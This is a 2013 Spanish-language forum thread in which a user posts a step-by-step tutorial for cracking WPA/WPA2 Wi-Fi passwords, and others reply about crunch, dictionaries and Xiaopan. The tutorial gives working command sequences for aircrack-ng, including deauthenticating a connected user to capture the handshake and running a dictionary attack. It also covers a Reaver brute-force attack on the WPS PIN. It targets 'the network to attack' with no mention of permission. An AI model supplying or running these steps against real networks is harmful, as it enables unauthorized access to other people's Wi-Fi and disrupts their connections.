Descifrar Claves Wpa/Wpa2 -Psk-Tkip-Aes --- 2013

Discussion in 'Manuales y Tutoriales' started by jonstroke, Nov 11, 2013.

  1. jonstroke

    jonstroke Usuario Casual nvl. 2
    7/41

    Joined:
    Nov 10, 2013
    Messages:
    1,536
    Likes Received:
    11
    Tutorial Paso a paso en video: donde se verán los tipos de seguridad wi-fi. El metodo de descifrar claves Wpa2 con diccionarios y otro metodo que es con Reaver.





    Los diccionarios de passwords, esos archivos que tanto usamos en nuestros ataques de fuerza bruta, con la esperanza de encontrar en su interior una combinación de letras, que formen la contraseña de algún usuario en un servicio que estemos auditando, son de gran ayuda e indispensables en la caja de herramientas de cualquier auditor; Podemos encontrar listas de passwords con nombres comunes, nombres de famosos, de películas, de ciudades, con los passwords mas utilizados, e incluso crear o extrapolar nuevos… pero hoy traigo otro tipo de passwords, passwords de sitios cuyas bases de datos han sido expuestas en la red.


    Pasos para Descifrar Claves WPA/WPA2 con Diccionarios :


    1.-ver nuestras interfaces




    airmon-ng


    [​IMG]


    2.- seleccionar una interfaz y ponerla en modo monitor:


    airmon-ng start wlan1


    [​IMG]


    3.- Escanear las redes que estén cerca:


    airodump-ng mon0


    [​IMG]


    4.- seleccionar la red a atacar y capturar paquetes únicamente de la red seleccionada:


    airodump-ng -c -w wpa2 –bssid “Poner MAC” mon0


    [​IMG]


    5.- ahora vamos a capturar el HandShake, para eso vamos a desconectar a la persona que este conectada en el modem y obligarla a que se vuelva a conectar y en ese momento tendremos el HandShake:


    aireplay-ng -0 20 -a “Poner la MAC” -c ”Poner la Station” mon0


    [​IMG]


    6.- Cuando tengamos el HandShake se mostrara en la parte de arriba de la terminal:


    [​IMG]


    7.- Vamos a cargar un diccionario primero ponemos ls


    ls


    [​IMG]


    8.-Ahora cargamos el diccionario, en mi caso guarde todo en la carpeta root, si lo guardaste en otra parte pon la ubicación del archivo, también debes poner el el archivo que guardamos y en el que capturamos el handshake en mi caso se llamo “wpa2″. ejemplo de todo y el comando:


    aircrack-ng -w diccionario.lst /root/wpa2-01.cap


    [​IMG]


    8.- Ahora ya comenzamos a probar las contraseñas que vienen en el diccionario. Este es solo de prueba, el diccionario ya esta desactualizado pero así se vera cuando este buscando el password:


    [​IMG]


    9.- Con un diccionario completo tienes mayor posibilidades de encontrar el password o la clave y cuando termine y la encuentre se vera así:


    [​IMG]


    Atacar una red con diccionario es efectivo en un 80% si es que el usuario no a modificado o personalizado su contraseña, se puede dar cuenta, cuando el usuario a cambiado su contraseña por que normal mente también cambia el nombre de su red.


    Si el usuario ha cambiado su clave y la personalizo, tendremos una posibilidad de tener éxito de un 30% a un 60% de descifrar su contraseña con diccionarios.


    ————————————————————————————-


    AHORA VAMOS CON REAVER


    También tenemos la segunda opción para descifrar claves wpa/wpa2 con REAVER el cual es mas facil, si es que el modem al que vamos a atacar cuenta con el sistema WPS.


    Básicamente el fallo en WPS descubierto por Viehböck es que uno de los 4 métodos de autenticación ofrecidos por el estándar, en el que se utilizan un PIN de 8 dígitos, no limita el numero de intentos erróneos, permitiendo ataques de fuerza bruta, pero además, con solo enviar los primeros 4 dígitos del PIN, si estos son erróneos, el sistema responde con un EAP-NACK evitando así que se tengan que procesar los siguientes 4 dígitos y facilitando la tarea del atacante quien no tendrá que procesar 100 millones de contraseñas sino solo 20.000.


    1.- Lo primero que debemos hacer es ver nuestras interfaces:


    airmon-ng


    [​IMG]


    2.- Después seleccionar una interfaz y ponerla en modo monitor:


    airmon-ng start wlan1


    [​IMG]


    3.- Después escanear las redes que estén a nuestro alcance:


    airodump-ng mon0


    [​IMG]


    4.-Ahora antes de realizar el ataque con REAVER verificar primero que el modem que vayamos a atacar cuente con el sistema WPS para ello utilizamos el siguiente comando en el cual pondremos la MAC del modem que seleccionemos y nos dirá en la parte ”Wps Locked” si el wps esta activado o no, saldrá YES / NO si dice YES entonces podremos utilizar RAVER de lo contrario entonces nos conviene mejor realizar un ataque con DICCIONARIOS.


    wash -i mon0 -b “Poner la MAC “


    [​IMG]


    [​IMG]


    5.- Ya que confirmamos que el wps esta activado entonces realizamos el ataque con REAVER


    reaver -i mon0 -b “Poner la MAC del moden que vas a atacar” -vv


    [​IMG]


    REAVER comenzara realizar el ataque, les mostrara las peticiones que vaya realizando y al final les mostrara la contraseña o clave y el PIN del sistema WPS. Esto puede tardar dependiendo de la intensidad de la señal Wifi y puede tomar 2 – 3 – 8 – 12 – 15 Horas.


    [​IMG]




    [​IMG]




    WPA2 AES es la mas fuerte sin embargo con REAVER no resulta ningún problema, solo es cuestion de tiempo. por el momento es el método mas efectivo para descifrar claves wpa y wpa2 ya que muy pronto los modems tendrán seguridad wpa3 y estos metofos dejaran de ser efectivos, como en este mundo de la tecnología NADA es 100% seguro y ya habrá mas herramientas para realizar auditorias WI-FI.​
     
    #1 jonstroke, Nov 11, 2013
    Last edited by a moderator: Nov 14, 2016
  2. ►!pคຖ¢hนl໐!◄

    ►!pคຖ¢hนl໐!◄ Usuario Maestro nvl. 6 ★ ★ ★ ★
    687/812

    Joined:
    Jun 13, 2010
    Messages:
    90,496
    Likes Received:
    20
    y si no tiene activado el wps? entonces como desifro la clave?
     
  3. AnswerTo

    AnswerTo Usuario Casual nvl. 2
    37/41

    Joined:
    Mar 14, 2012
    Messages:
    3,263
    Likes Received:
    2
    hay uno que creo pocos conocen , que se llama crunch , crunch lo que hace es ir probando combinaciones de letras,numeros, simbolos y espacios para encontrar la contraseña , la paja de esto es que puedes estar toda una vida buscando una contrasela con una longitud no determinada , y quizas cn cuanta combinacion de letras y numeros, sacar wpa es una paja si no tiene WPS
     
  4. PePe_9

    PePe_9 Usuario Habitual nvl.3 ★
    187/244

    Joined:
    Jul 16, 2008
    Messages:
    22,458
    Likes Received:
    5
    Esta bueno el tuto compa, se agradece. Recomiendo utilizar xiaopan, es más domestico para el uso de reaver, con unos cuantos clicks tate!.
    Ahora, nunca he hecho una auditoría con diccionario, alguien sabe aprox, cuanto puede demorar?
     
  5. AnswerTo

    AnswerTo Usuario Casual nvl. 2
    37/41

    Joined:
    Mar 14, 2012
    Messages:
    3,263
    Likes Received:
    2
    toda una vida si la contrasñea no se encuentra en el diccionario , recuerda que ese procedimiento funciona, siempre y cuando la contraseña este escrita dentro del diccionario , y para los que tengan la duda no funciona como un decifrador de codigos , no va de letra en letra , es por combinacion completa , por eso en ese caso es mas efectivo crunch , ya que es mucho mas personalizable , pero para estas claves lo mejor es Reaver
     
  6. PePe_9

    PePe_9 Usuario Habitual nvl.3 ★
    187/244

    Joined:
    Jul 16, 2008
    Messages:
    22,458
    Likes Received:
    5
    Vale compañero gracias por la respuesta. Entonces imagino que aún si la red no tiene activado WPS cagamos xD
     
  7. freinao

    freinao Usuario Nuevo nvl. 1
    7/41

    Joined:
    Feb 8, 2014
    Messages:
    42
    Likes Received:
    1
    completamente de acuerdo, diccionarios.
    valen callampa.
    recuerdo que bt 5 tenia la opcion de compilar tu propio diccionario y usarlo.

    sl2